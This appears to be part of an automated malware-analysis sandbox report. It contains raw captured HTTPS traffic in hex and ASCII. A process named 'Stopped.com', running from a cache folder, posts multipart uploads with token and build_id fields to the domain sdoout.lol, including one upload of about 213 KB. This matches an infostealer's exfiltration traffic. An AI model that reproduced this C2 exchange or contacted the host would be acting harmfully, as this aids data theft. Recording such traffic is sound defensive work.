                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                                                            Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                            Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                                                            Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:58 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                                                            Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            15192.168.2.549928116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:00 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----5ppzmop8g4wln7g4wbi5
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 1077
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:00 UTC1077OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 70 7a 6d 6f 70 38 67 34 77 6c 6e 37 67 34 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 35 70 70 7a 6d 6f 70 38 67 34 77 6c 6e 37 67 34 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 35 70 70 7a 6d 6f 70 38 67 34 77 6c 6e 37 67 34 77 62 69 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------5ppzmop8g4wln7g4wbi5Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------5ppzmop8g4wln7g4wbi5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------5ppzmop8g4wln7g4wbi5Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:01 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            16192.168.2.549940116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----y5ppzmgln7qqimgv3wba
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 213453
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------y5ppzmgln7qqimgv3wbaContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------y5ppzmgln7qqimgv3wbaContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------y5ppzmgln7qqimgv3wbaCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:03 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            17192.168.2.549947116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:02 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----y5ppzmgln7qqimgv3wba
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 55081
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 70 7a 6d 67 6c 6e 37 71 71 69 6d 67 76 33 77 62 61 0d 0a 43 6f 6e 74
